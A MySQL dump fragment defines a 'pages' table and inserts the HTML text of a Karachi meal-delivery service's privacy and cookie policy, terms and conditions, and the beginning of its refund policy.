-- Table structure for table `pages`
--

CREATE TABLE `pages` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL,
  `slug` varchar(45) NOT NULL,
  `content` text,
  `active` tinyint(1) NOT NULL DEFAULT '1',
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1;

--
-- Dumping data for table `pages`
--

INSERT INTO `pages` VALUES (1,'Privacy Policy','privacy-policy','<p class=\"default_text text-left open_sans\">We are committed to protecting the privacy of our customers while at\n                                            the\n                                            same time providing a personalised and valuable service. While it is\n                                            important for us to collect personal information about you all such\n                                            information will be collected with your consent.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><br><strong>Who we are</strong></p>\n                                        <p class=\"default_text text-left open_sans\">This Privacy Policy explains our privacy practices in relation to\n                                            Dietbox. Our website is <a href=\"https://www.dietbox.pk\">www.dietbox.pk</a> .</p>\n                                        <p class=\"default_text text-left open_sans\">In order to provide our Services and Websites to you and to promote\n                                            our\n                                            business, we will need to collect and process certain personal\n                                            information about you. We are committed to protecting the privacy of\n                                            our\n                                            customers in accordance with applicable data protection laws,\n                                            including\n                                            the General Data Protection Regulation (together, <strong>“Data\n                                                Protection Laws”</strong>).</p>\n                                        <p class=\"default_text text-left open_sans\"><br><br><strong>Contacting us</strong></p>\n                                        <p class=\"default_text text-left open_sans\">If you have any questions at all about this Privacy Policy, our\n                                            Services\n                                            or Websites or about how we use and process your personal\n                                            information,\n                                            please contact us by email at <a href=\"mailto:support@dietbox.pk\">support@dietbox.pk</a>\n                                        </p>\n                                        <p class=\"default_text text-left open_sans\"><br><br><strong>Changes to this Privacy Policy</strong></p>\n                                        <p class=\"default_text text-left open_sans\">Changes to this Privacy Policy will be posted on this page and/or\n                                            elsewhere on our Websites as appropriate, so that you will be aware\n                                            of\n                                            the information we collect and how we use it at all times. You are\n                                            asked\n                                            to read this regularly so that you are satisfied with the privacy\n                                            conditions under which we provide our Services and Websites to\n                                            you.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><br><strong>Our role</strong></p>\n                                        <p class=\"default_text text-left open_sans\">We collect certain personal information about you as further\n                                            described in\n                                            this Privacy Policy, either in providing our Services or Websites to\n                                            you\n                                            or so that we may promote our Services to you.</p>\n                                        <p class=\"default_text text-left open_sans\">Under applicable Data Protection Laws, we will be the<strong> “data\n                                                controller” </strong>of the personal information that we collect\n                                            about\n                                            you in connection with your use of our Services or Websites.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><br><strong>When we collect information </strong></p>\n                                        <p class=\"default_text text-left open_sans\">We will collect personal information about you in these\n                                            circumstances:</p>\n                                        <ul class=\"default_text text-left open_sans\">\n                                            <li>When you create an account or fill in forms on our Websites</li>\n                                            <li>When you contact us by phone, email or otherwise interact with\n                                                us or\n                                                provide information to us\n                                            </li>\n                                            <li>When you order any Services from us</li>\n                                            <li>When you subscribe to notifications, emails, newsletters or\n                                                other\n                                                communications\n                                            </li>\n                                            <li>When you redeem a benefit, enter a promotion, competition or\n                                                survey\n                                            </li>\n                                            <li>When you submit payment information to us</li>\n                                            <li>When you visit our Websites</li>\n                                        </ul>\n                                        <p class=\"default_text text-left open_sans\"><br><br><strong>What information we collect</strong></p>\n                                        <p class=\"default_text text-left open_sans\">We may collect the following types of personal information about\n                                            you:</p>\n                                        <ul class=\"default_text text-left open_sans\">\n                                            <li>Your name</li>\n                                            <li>Telephone number</li>\n                                            <li>Email address</li>\n                                            <li>Delivery address</li>\n                                            <li>Personal information about your dietary needs, relevant medical\n                                                conditions, allergies and other requirements, goals and\n                                                preferences\n                                                related to our Services\n                                            </li>\n                                            <li>Some limited demographic information relevant to our Services\n                                            </li>\n                                            <li>We may also derive some information about you when you visit our\n                                                Websites or open emails that we send to you, including general\n                                                user\n                                                information about your computer and your visits (including your\n                                                IP\n                                                address, location, browser, operating system, referral source,\n                                                length of visit and the pages you visit). This information can\n                                                be\n                                                facilitated by cookies (see our <strong>Cookies </strong>policy\n                                                below)\n                                            </li>\n                                        </ul>\n                                        <p class=\"default_text text-left open_sans\"><br><br><strong>How we use your information</strong></p>\n                                        <p class=\"default_text text-left open_sans\">We may use the personal information we collect in a number of ways,\n                                            including:</p>\n                                        <ul class=\"default_text text-left open_sans\">\n                                            <li>Identifying you and managing your account and relationship with\n                                                us\n                                            </li>\n                                            <li>Processing your orders</li>\n                                            <li>Discussing and advising you in relation to your requirements\n                                            </li>\n                                            <li>Notifying you of changes to our Services and applicable legal\n                                                terms,\n                                                including this Privacy Policy\n                                            </li>\n                                            <li>Better understanding who our customers are and what they want\n                                            </li>\n                                            <li>Improving our Services and Websites</li>\n                                            <li>Promoting our similar goods and services to you</li>\n                                            <li>Managing our business, including for accounting and auditing\n                                                purposes\n                                            </li>\n                                            <li>Maintaining our Websites and IT systems</li>\n                                            <li>Dealing with any complaints or legal disputes involving you or\n                                                our\n                                                suppliers\n                                            </li>\n                                            <li>Preventing fraud</li>\n                                        </ul>\n                                        <p class=\"default_text text-left open_sans\"><br><br><strong> </strong></p>\n                                        <p class=\"default_text text-left open_sans\"><br><br><strong>Lawful basis on which we use your information</strong></p>\n                                        <p class=\"default_text text-left open_sans\">We will only ever use your personal information as permitted under\n                                            Data\n                                            Protection Law, which means one or more of the following will always\n                                            apply:</p>\n                                        <ul class=\"default_text text-left open_sans\">\n                                            <li>To perform our contractual obligations</li>\n                                            <li>To comply with our legal and regulatory obligations</li>\n                                            <li>In pursuing our legitimate interests or those of a third party\n                                                (for\n                                                example, conducting our business in an efficient and compliant\n                                                manner) and where your interests and fundamental rights do not\n                                                override these interests\n                                            </li>\n                                            <li>Where you have given clear and valid consent to such use.</li>\n                                        </ul>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>We <u>do not</u> sell or share your personal information with\n                                                third parties for their own marketing purposes. </strong></p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>When we share your information with others</strong></p>\n                                        <p class=\"default_text text-left open_sans\">We may work with others as part of providing our Services and\n                                            Websites\n                                            and may need to share your information with them as follows:</p>\n                                        <ul class=\"default_text text-left open_sans\">\n                                            <li>To our employees, officers, insurers, professional advisors and\n                                                agents to the extent that it is reasonably necessary to do so\n                                                for\n                                                the above permitted purposes;\n                                            </li>\n                                            <li>To our third party suppliers and subcontractors to help us\n                                                provide\n                                                our Services and Websites to you and for other legitimate\n                                                business\n                                                reasons. These third parties include:\n                                                <ul class=\"default_text text-left open_sans\">\n                                                    <li>our delivery team</li>\n                                                    <li>our hosting service provider</li>\n                                                    <li>our customer relationship management system (CRM)\n                                                        provider\n                                                    </li>\n                                                    <li>our printers and PR team</li>\n                                                    <li>other third party subcontractors and service providers\n                                                        involved in our business\n                                                    </li>\n                                                </ul>\n                                            </li>\n                                            <li>To our regulators and law enforcement agencies</li>\n                                            <li>In the context of the possible sale or restructuring of our\n                                                business\n                                            </li>\n                                        </ul>\n                                        <p class=\"default_text text-left open_sans\">We require all third parties to respect the confidentiality of your\n                                            personal information. All our service providers are required to take\n                                            appropriate security measures to protect your personal information.\n                                            We\n                                            do not allow them to use your personal data for their own purposes,\n                                            but\n                                            only for specified purposes and in accordance with our\n                                            instructions.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong> </strong><br><strong>Cookies</strong></p>\n                                        <p class=\"default_text text-left open_sans\">We may use a “cookie” or your IP Address to recognise your computer\n                                            via\n                                            our website. Cookies are small pieces of information that are stored\n                                            by\n                                            your browser on your hard drive. They can inform us of the pages you\n                                            visit, and your preferences, which enables us to provide you with a\n                                            better online experience.</p>\n                                        <p class=\"default_text text-left open_sans\">You have the ability to accept or decline cookies by modifying the\n                                            settings in your browser. However, you may not be able to use all\n                                            the\n                                            interactive features of our site if cookies are disabled. To find\n                                            out\n                                            how to enable/disable cookies see <a href=\"http://www.allaboutcookies.org\">www.allaboutcookies.org</a>\n                                        </p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong> </strong><br><strong>Third Party Sites and Services</strong></p>\n                                        <p class=\"default_text text-left open_sans\">Our Websites may contain links to third party websites. Please be\n                                            notified that we cannot be held responsible for the privacy\n                                            practices of\n                                            other websites. We encourage all visitors to be aware and read the\n                                            privacy statements of each and every website that collects\n                                            personally\n                                            identifiable information.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Where your information is stored</strong></p>\n                                        <p class=\"default_text text-left open_sans\">Your information will be held at our offices in Karachi and our main\n                                            hosting data centres for our Websites are located in the\n                                            Pakistan.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>How we keep your personal information safe</strong></p>\n                                        <p class=\"default_text text-left open_sans\">We will safeguard your information in our custody. We have developed\n                                            and\n                                            will maintain adequate security procedures to safeguard personal\n                                            information against loss, theft, copying, and unauthorised\n                                            disclosure,\n                                            use or modification. Access to personal information is restricted to\n                                            employees and authorised service providers who need it to perform\n                                            their\n                                            work. We also regularly review our information collection, storage\n                                            and\n                                            processing practices, including physical security measures, to guard\n                                            against unauthorised access to systems</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Retention of Records</strong></p>\n                                        <p class=\"default_text text-left open_sans\">We will do our best not to keep your personal information for longer\n                                            than\n                                            necessary to facilitate your use of the Services and Websites, other\n                                            than as required by law. We will regularly review the information\n                                            that\n                                            we hold and delete unnecessary information from our systems.</p>\n                                        <p class=\"default_text text-left open_sans\">Unless you request otherwise, we may retain information that will\n                                            make\n                                            providing our Services and Websites to you more convenient and\n                                            safer,\n                                            such as your dietary preferences and requirements and important\n                                            allergy\n                                            and health information in relation to previous orders, but you have\n                                            the\n                                            right to ask us to delete any information that we hold about you –\n                                            see\n                                            the <strong>Your Rights</strong> section below.</p>\n                                        <p class=\"default_text text-left open_sans\">When your personal information is no longer required, it will be\n                                            destroyed either by shredding or other approved destruction methods\n                                            to\n                                            prevent unauthorised parties from gaining access to the information\n                                            during and after the process.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Your rights</strong></p>\n                                        <p class=\"default_text text-left open_sans\">You have several rights as a data subject as summarised below:</p>\n                                        <ul class=\"default_text text-left open_sans\">\n                                            <li><strong>Access:</strong> You have the right to obtain\n                                                confirmation\n                                                as to whether your personal information is being processed by us\n                                                and, if it is, to access your information and details of how we\n                                                process it, as long as this does not adversely affect the rights\n                                                and\n                                                freedoms of others.\n                                            </li>\n                                            <li><strong>Rectification:</strong> We will rectify any errors in\n                                                the\n                                                personal information we hold on request.\n                                            </li>\n                                            <li><strong>Erasure:</strong> You may ask us to erase your personal\n                                                information from our systems in the following situations:\n                                                <ul class=\"default_text text-left open_sans\">\n                                                    <li>The information is no longer necessary in relation to\n                                                        the\n                                                        purpose for which it was collected;\n                                                    </li>\n                                                    <li>You withdraw your consent on which the processing is\n                                                        based\n                                                        and where there is no other legal ground for the\n                                                        processing;\n                                                    </li>\n                                                    <li>You object to the processing and there are no overriding\n                                                        legitimate grounds for the processing;\n                                                    </li>\n                                                    <li>The information has been unlawfully processed;</li>\n                                                    <li>The information has to be erased for compliance with a\n                                                        legal\n                                                        obligation to which we are subject.\n                                                    </li>\n                                                </ul>\n                                            </li>\n                                            <li><strong>Right to restrict processing: </strong>You have the\n                                                right to\n                                                restrict our processing on specified grounds.\n                                            </li>\n                                            <li><strong>Notification:</strong> Where you have asked us to\n                                                rectify,\n                                                erase or restrict processing of your information, we shall\n                                                communicate the same to each recipient to whom your information\n                                                has\n                                                been disclosed, unless this proves impossible or involves\n                                                disproportionate effort, in which case we shall let you know.\n                                            </li>\n                                            <li><strong>Data portability:</strong> You have the right in\n                                                specific\n                                                circumstances where processing is based on consent to receive\n                                                your\n                                                information in a structured, commonly used and machine-readable\n                                                format and have the right to transmit the information to another\n                                                controller without hindrance, provided that our processing is\n                                                carried out by automated means.\n                                            </li>\n                                            <li><strong>Right to object: </strong>In certain circumstances you\n                                                have\n                                                the right to object to our processing of your information,\n                                                including\n                                                in relation to profiling, direct marketing or scientific or\n                                                historical research purposes.\n                                            </li>\n                                        </ul>\n                                        <p class=\"default_text text-left open_sans\">You also have the right to object to automated decision-making,\n                                            including\n                                            profiling, but we do not use your information for these\n                                            purposes.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>How to exercise your rights</strong></p>\n                                        <p class=\"default_text text-left open_sans\">To exercise any of your other data subject rights, please contact us\n                                            (see\n                                            <strong>Contacting Us)</strong>:</p>\n                                        <ul class=\"default_text text-left open_sans\">\n                                            <li>You may request a copy of information undergoing processing,\n                                                subject\n                                                to evidence of your identity (normally a certified copy of your\n                                                passport plus an original copy of a utility bill showing your\n                                                current address). The first copy shall be provided without\n                                                charge,\n                                                but reasonable administration fees shall be charged for\n                                                additional\n                                                or subsequent copies.\n                                            </li>\n                                            <li>We shall respond to your requests without undue delay and in any\n                                                event within one month unless we need to extend such period by\n                                                up to\n                                                two further months in specific circumstances.\n                                            </li>\n                                            <li>Please note that if you delete or restrict your account or\n                                                required\n                                                information, this may prevent you from making full use of our\n                                                Services or Websites.\n                                            </li>\n                                        </ul>\n                                        <p class=\"default_text text-left open_sans\"><br><strong> </strong></p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>What happens if a data breach occurs</strong></p>\n                                        <p class=\"default_text text-left open_sans\">Whilst we endeavour to keep your personal information safe, we have\n                                            an\n                                            internal investigation procedure in case of data protection security\n                                            breaches.</p>\n                                        <p class=\"default_text text-left open_sans\">In the event of data theft, we may suspend access to our servers,\n                                            emails\n                                            and online systems and take other urgent steps to prevent further\n                                            unauthorised access to information.</p>\n                                        <p class=\"default_text text-left open_sans\">If we believe that our data has been compromised, we will report the\n                                            issue to the PTA &amp; FIA </p>\n                                        <p class=\"default_text text-left open_sans\">We will notify you without delay if we believe a data breach is\n                                            likely to\n                                            result in a significant risk to your rights and freedoms. Any\n                                            notification will describe in clear and plain language the nature of\n                                            the\n                                            personal data breach and contain all required information.</p>\n                                        <h3>Cookie Policy</h3>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Cookies and how they benefit you</strong><br>\n                                            Our website uses cookies, as almost all websites do, to help provide\n                                            you\n                                            with the best experience we can. Cookies are small text files that\n                                            are\n                                            placed on your computer or mobile phone when you browse websites.\n                                        </p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Our cookies help us:</strong></p>\n                                        <ul class=\"default_text text-left open_sans\">\n                                            <li>Make our website work as you’d expect</li>\n                                            <li>Improve the speed/security of the site</li>\n                                            <li>Continuously improve our website for you</li>\n                                            <li>Make our marketing more efficient (ultimately helping us to\n                                                offer\n                                                the service we do at the price we do)\n                                            </li>\n                                        </ul>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>We do not use cookies to:</strong></p>\n                                        <ul class=\"default_text text-left open_sans\">\n                                            <li>Collect any personally identifiable information (without your\n                                                express permission)\n                                            </li>\n                                            <li>Collect any sensitive information (without your express\n                                                permission)\n                                            </li>\n                                            <li>Pass personally identifiable data to third parties</li>\n                                        </ul>\n                                        <p class=\"default_text text-left open_sans\">You can learn more about all the cookies we use below.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Granting us permission to use cookies<br>\n                                            </strong>If the settings on your software that you are using to view\n                                            this\n                                            website (your browser) are adjusted to accept cookies we take this,\n                                            and\n                                            your continued use of our website, to mean that you are fine with\n                                            this.\n                                            Should you wish to remove or not use cookies from our site you can\n                                            learn\n                                            how to do this below, however doing so will likely mean that our\n                                            site\n                                            will not work as you would expect.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>More about our Cookies –&nbsp;</strong><br><strong>Website\n                                                Function\n                                                Cookies</strong></p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Our own cookies<br>\n                                            </strong>We use cookies to make our website work including:</p>\n                                        <ul class=\"default_text text-left open_sans\">\n                                            <li>Making our shopping basket and checkout work</li>\n                                            <li>Allowing you to add comments to our site</li>\n                                        </ul>\n                                        <p class=\"default_text text-left open_sans\">There is no way to prevent these cookies being set other than to not\n                                            use\n                                            our site.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Anonymous Visitor Statistics Cookies<br>\n                                            </strong>We use cookies to compile visitor statistics such as how\n                                            many\n                                            people have visited our website, what type of technology they are\n                                            using\n                                            (e.g. Mac or Windows which helps to identify when our site isn’t\n                                            working\n                                            as it should for particular technologies), how long they spend on\n                                            the\n                                            site, what page they look at etc. This helps us to continuously\n                                            improve\n                                            our website. These so called â€œanalyticsâ€ programs also tell us\n                                            if ,\n                                            on an anonymous basis, how people reached this site (e.g. from a\n                                            search\n                                            engine) and whether they have been here before helping us to put\n                                            more\n                                            money into developing our services for you instead of marketing\n                                            spend.\n                                        </p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>We use:</strong></p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Advertising Cookies<br>\n                                            </strong>Cookies are widely used in online advertising. Neither us,\n                                            advertisers or our advertising partners can gain personally\n                                            identifiable\n                                            information from these cookies.</p>\n                                        <p class=\"default_text text-left open_sans\">You can learn more about online advertising at\n                                            http://www.youronlinechoices.com. You can opt-out of almost all\n                                            advertising cookies at http://www.youronlinechoices.com although we\n                                            would prefer that you didn’t as ultimately adverts help keep much of\n                                            the\n                                            internet free. It is also worth noting that opting out of\n                                            advertising\n                                            cookies will not mean you won’t see adverts, just simply that they\n                                            won’t\n                                            be tailored to you any longer.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>We use:</strong></p>\n                                        <ul class=\"default_text text-left open_sans\">\n                                            <li>DoubleClick –&nbsp;owned by Google</li>\n                                            <li>Admeld</li>\n                                            <li>Right Media&nbsp;owned by Yahoo!</li>\n                                        </ul>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Re-marketing Cookies<br>\n                                            </strong>You may notice that sometimes after visiting a site you see\n                                            increased numbers of adverts from the site you visited. This is\n                                            because\n                                            advertisers, including ourselves pay for these adverts. The\n                                            technology\n                                            to do this is made possible by cookies and as such we may place a so\n                                            called â€œremarketing cookieâ€ during your visit. We use these\n                                            adverts\n                                            to offer special offers etc to encourage you to come back to our\n                                            site.\n                                            Don’t worry we are unable to proactively reach out to you as the\n                                            whole\n                                            process is entirely anonymised. You can opt out of these cookies at\n                                            anytime as explained above.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Affiliate Cookies<br>\n                                            </strong>We have a number of partners who promote our service on a\n                                            success-only basis (i.e. instead of paying for advertising, we pay\n                                            them\n                                            commissions on sales). Cookies are required to allow us to reward\n                                            these\n                                            partners and these cookies are usually provided by specialist\n                                            companies\n                                            (known as affiliate networks). Neither us, the networks, or the\n                                            partner\n                                            advertising or recommending our services are able to identify you\n                                            personally. We ask you to support us by allowing these cookies which\n                                            ultimately help us to offer you the service we do at the price we\n                                            do.\n                                            Our affiliate cookies are provided by:</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Turning Cookies Off<br>\n                                            </strong>You can usually switch cookies off by adjusting your\n                                            browser\n                                            settings to stop it from accepting cookies. Doing so however will\n                                            likely\n                                            limit the functionality of our’s and a large proportion of the\n                                            world’s\n                                            websites as cookies are a standard part of most modern websites</p>\n                                        <p class=\"default_text text-left open_sans\">It may be that you concerns around cookies relate to so called\n                                            “spyware”.\n                                            Rather than switching off cookies in your browser you may find that\n                                            anti-spyware software achieves the same objective by automatically\n                                            deleting cookies considered to be invasive.</p>\n',1,NULL,NULL),(2,'Terms & Conditions','terms-and-conditions','<p class=\"default_text text-left open_sans\"><strong>Service Policy</strong><br>\n                                            Please read the following terms and conditions carefully. By placing\n                                            an\n                                            order with us you are agreeing to the conditions that appear below.\n                                        </p>\n                                        <p class=\"default_text text-left open_sans\"><b>Special</b><strong>&nbsp;Offers &amp; Competitions<br>\n                                            </strong>For specific reader offers please visit\n                                            our<strong>&nbsp;</strong><a href=\"/faqs\">FAQ page</a>.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Who we are</strong><br>\n                                            Dietbox is a service brought to you by Diet Box Team, a company\n                                            incorporated in Pakistan. By subscribing to use our service, a\n                                            binding\n                                            contract will be formed between us and the person identified as the\n                                            client in the order process.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>How to Order</strong><br>\n                                            Placing your order could not be easier. All you need to do is sign\n                                            up\n                                            through our website <a href=\"http://dietbox.local/karachi\">“Get\n                                                Started”</a> area. We will ask you to provide some personal\n                                            information such as your name, address, telephone number, email\n                                            address,\n                                            delivery and billing information to assist us to provide our service\n                                            to\n                                            you.</p>\n                                        <p class=\"default_text text-left open_sans\">Our Client Service Representative will reach you and will get the\n                                            payment\n                                            and entitled you for whatever plan you want, He will guide you with\n                                            all\n                                            the plans so that you can understand it throughly.and after\n                                            recieving\n                                            the payment you will get your member login details,so that you will\n                                            get\n                                            access to the members area and even access the apps which will up to\n                                            date you with your daily food table.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Your Dietbox Menu Plan</strong><br>\n                                            There are two options to choose from: our Lighter Menu Plan at about\n                                            1200 calories per day or our Market Menu Plan at about 1800 calories\n                                            per\n                                            day. We will do our best to review your personal information before\n                                            you\n                                            start to help ensure you have chosen the correct menu plan and will\n                                            advise where necessary. Our Starter information sets out what you\n                                            should\n                                            expect from your Dietbox. We aim to provide nutritionally-healthy\n                                            food\n                                            boxes designed for weight loss and healthy eating. Dietbox comprises\n                                            of\n                                            deliveries on Monday / Tuesday and/or Friday depending on which type\n                                            of\n                                            Dietbox you have chosen.So far we are working in Karachi(for special\n                                            depand and fee we will provide you dietbox on weekends otherwise you\n                                            will recieve these boxs on friday)</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Nutritional Advice</strong><br>\n                                            The Dietbox menus are designed by the team of experts at DietBox If\n                                            you\n                                            have any questions about the nutritional aspects of this service,\n                                            please\n                                            let us know immediately and we shall be happy to discuss these with\n                                            you.\n                                            Any nutritional advice is only general and must not be relied upon\n                                            as\n                                            being specific health advice.</p>\n                                        <p class=\"default_text text-left open_sans\">We aim to ensure that our menus are delicious and interesting.\n                                            Because\n                                            the Dietbox is a standardised menu, however, we cannot offer you any\n                                            tailored dietary choices and we reserve the right to make any\n                                            changes to\n                                            the menus at our sole discretion. In particular, currently we are\n                                            unable\n                                            to deliver to those who suffer from food allergies or diabetics who\n                                            are\n                                            insulin dependent.</p>\n                                        <p class=\"default_text text-left open_sans\">The meals are designed to be nutritionally-balanced, but specific\n                                            health\n                                            or dietary objectives or benefits from subscribing to Dietbox cannot\n                                            be\n                                            guaranteed.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>If you are in any doubt about your health, you must see your\n                                                own\n                                                nutritionist or doctor as soon as possible.</strong></p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Payment</strong><br></p>\n                                        <p class=\"default_text text-left open_sans\">Our Customer Service Representative will receive the cash from you at\n                                            your doorstep.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Deliveries </strong><br>\n                                            Dietbox deliver &nbsp;throughout Karachi.</p>\n                                        <p class=\"default_text text-left open_sans\">We will be glad to arrange for delivery to an address different to\n                                            the\n                                            invoice address. Please indicate clearly the delivery address when\n                                            placing your order.</p>\n                                        <p class=\"default_text text-left open_sans\">If you require us to access secure parts of your home or building in\n                                            order to deliver your Dietbox, please notify us of this at the time\n                                            of\n                                            placing your order. We will liaise with you in order to obtain keys,\n                                            passes or codes before your first delivery and we will of course\n                                            take\n                                            special care over your property and access details. Please keep us\n                                            up to\n                                            date with any changes that might affect our ability to deliver to\n                                            you.\n                                            If we cannot access your building because of changes that we have\n                                            not\n                                            been notified of, we will attempt to contact you to make other\n                                            arrangements. If we are unable to deliver in such circumstances, we\n                                            reserve the right to charge you for that delivery. Please contact us\n                                            at\n                                            the end of your subscription to arrange for your keys or passes to\n                                            be\n                                            returned if you do not wish to continue with Dietbox at a later\n                                            date.</p>\n                                        <p class=\"default_text text-left open_sans\">We will deliver your Dietbox to you as per your request /\n                                            subscription.</p>\n                                        <p class=\"default_text text-left open_sans\">Due to circumstances beyond control, sometimes our couriers\n                                            experience\n                                            unavoidable delays. In these circumstances we respectfully request\n                                            that\n                                            you allow these times for receipt of your Dietbox. In the event that\n                                            delivery still has not been made or attempted on delivery days, we\n                                            will\n                                            make a full refund for that delivery. We shall not be liable for any\n                                            non-delivery, even if it is our fault, unless you notify us by\n                                            telephone\n                                            by 1pm on the due day. Any liability for non-delivery shall be\n                                            limited\n                                            to replacing your Dietbox within a reasonable time or issuing a\n                                            credit\n                                            note to you for that day.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Handling</strong><br>\n                                            Chilled products are packaged in specially designed insulated boxes\n                                            containing ice or gel packs to maintain the required temperature.\n                                            Frozen\n                                            and chilled products should be put in freezers and refrigerators\n                                            respectively upon receipt. Cooking and re-heating instructions must\n                                            be\n                                            followed closely. Make sure that re-heated food is piping hot\n                                            throughout.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>The Dietbox Guarantee</strong><br>\n                                            It is our intention to give total customer satisfaction through the\n                                            goods and services we offer. Your Dietbox should reach you in\n                                            perfect\n                                            condition. If you have reason to suspect that a product is somehow\n                                            damaged, unfit for human consumption or is incomplete, please\n                                            contact us\n                                            immediately. We shall endeavour to give you an appropriate refund\n                                            where\n                                            possible at our discretion. If you do not let us know by 1pm on the\n                                            delivery day of any such problems, we may not be able to refund the\n                                            item\n                                            and you will be deemed as having accepted Dietbox meals in that\n                                            delivery, unless we agree otherwise.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Theft</strong><br>\n                                            Theft or suspected theft of Dietbox from the delivery address shall\n                                            not\n                                            be deemed as the fault of either the courier or Dietbox. Please let\n                                            us\n                                            know immediately if you have reason to suspect that your Dietbox has\n                                            been stolen from the delivery address. We shall liaise with you to\n                                            make\n                                            alternative arrangements if there is a risk that the theft will\n                                            happen\n                                            again, which may mean making alternative delivery arrangements. In\n                                            the\n                                            meantime, we reserve the right to suspend your subscription until\n                                            new\n                                            arrangements have been finalised or to cancel the remaining\n                                            subscription, but if we cancel we will refund to you the fees\n                                            already\n                                            paid for any cancelled part of your subscription period.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Warranties and Liability</strong><br>\n                                            Nothing in these terms and conditions shall:</p>\n                                        <ul class=\"default_text text-left open_sans\">\n                                            <li>Exclude or restrict our liability for death or personal injury\n                                                resulting from our negligence or our liability for fraudulent\n                                                misrepresentation; or\n                                            </li>\n                                            <li>Affect your statutory rights if you are transacting as a\n                                                consumer.\n                                            </li>\n                                        </ul>\n                                        <p class=\"default_text text-left open_sans\">Subject to the above paragraph, our entire liability shall be capped\n                                            at\n                                            the sums paid by you for our service during the relevant\n                                            subscription\n                                            period. In no event shall we be held liable to you for any special,\n                                            indirect or consequential damages, loss of profits or goodwill.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Changes to Terms</strong><br>\n                                            We reserve the right to make changes at any time to any part of\n                                            these\n                                            terms and conditions. All such changes will be published on the\n                                            website\n                                            (dietbox.pk) and/or shall be sent to you by post or with your\n                                            Dietbox\n                                            deliveries. If you use our website or place any order with us after\n                                            the\n                                            changes have been published, you are agreeing to be bound by those\n                                            changes in respect of that order.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>Use of the Website and our Publications</strong><br>\n                                            Unauthorised duplication or publication of any materials from our\n                                            website or elsewhere is prohibited.</p>\n                                        <p class=\"default_text text-left open_sans\">Unauthorised duplication or publication of any other materials\n                                            including\n                                            but not limited to starter information, worksheets, recipes,\n                                            brochures,\n                                            text, graphics, newsletters, the selection and arrangement thereof,\n                                            and\n                                            all software compilations, underlying source code and software is\n                                            prohibited.</p>\n                                        <p class=\"default_text text-left open_sans\">You may retrieve and display content from our website on a computer\n                                            screen and print out individual pages on paper for the sole purpose\n                                            of\n                                            placing an order with us or using information for your private,\n                                            non-commercial purposes in connection with your normal use of our\n                                            products and services, but all other uses are strictly prohibited\n                                            except\n                                            with prior written permission from us. You acknowledge that Dietbox\n                                            is\n                                            our trade mark and that you may not use the name.</p>\n                                        <p class=\"default_text text-left open_sans\"><br><strong>General Provisions</strong><br>\n                                            We shall not be liable for any delay or failure to perform any of\n                                            our\n                                            obligations under these terms and conditions due to any cause beyond\n                                            our\n                                            reasonable control, including industrial action.</p>\n                                        <p class=\"default_text text-left open_sans\">These terms and conditions constitute the entire agreement between\n                                            you\n                                            and us and supersede any previous agreement or understanding and may\n                                            not\n                                            be varied except in writing between us. All other terms and\n                                            conditions\n                                            express or implied by statute or otherwise, are excluded to the\n                                            fullest\n                                            extent permitted by law.<br>\n                                            The waiver by us of any breach or default of these conditions shall\n                                            not\n                                            be construed as a continued waiver of that breach, nor as a waiver\n                                            of\n                                            any subsequent breach of the same or any other provision.</p>\n                                        <p class=\"default_text text-left open_sans\">If any provision of these conditions is held by any competent\n                                            authority\n                                            to be invalid or unenforceable in whole or in part, the validity of\n                                            the\n                                            other provisions of these conditions and the remainder of the\n                                            provision\n                                            in question shall not be affected.</p>\n                                ',1,NULL,NULL),(3,'Refund Policy','refund-policy','<p class=\"default_text text-left open_sans\"><strong>Cancellations / Refunds</strong></p>\n                                        <p class=\"default_text text-left open_sans\">We guarantee the quality of our products and their delivery in good condition.\n                                            Because we produce a perishable product, we CANNOT accept returned food items. We will promptly credit for any food item or meal that was damaged, spoiled, or impaired as a direct result of shipping or delivery.\n                                            If you are unhappy with the service for any reason and wish to cancel, we will never bound you with any hidden terms and condition and we will refund the cost of all remaning food and deliveries, you must contact us in advanced for any cancellation</p>\n                                        <p class=\"default_text text-left open_sans\">Keep in mind our per day order including delivery charges is Rs. 1000</p>\n                                        <p class=\"default_text text-left 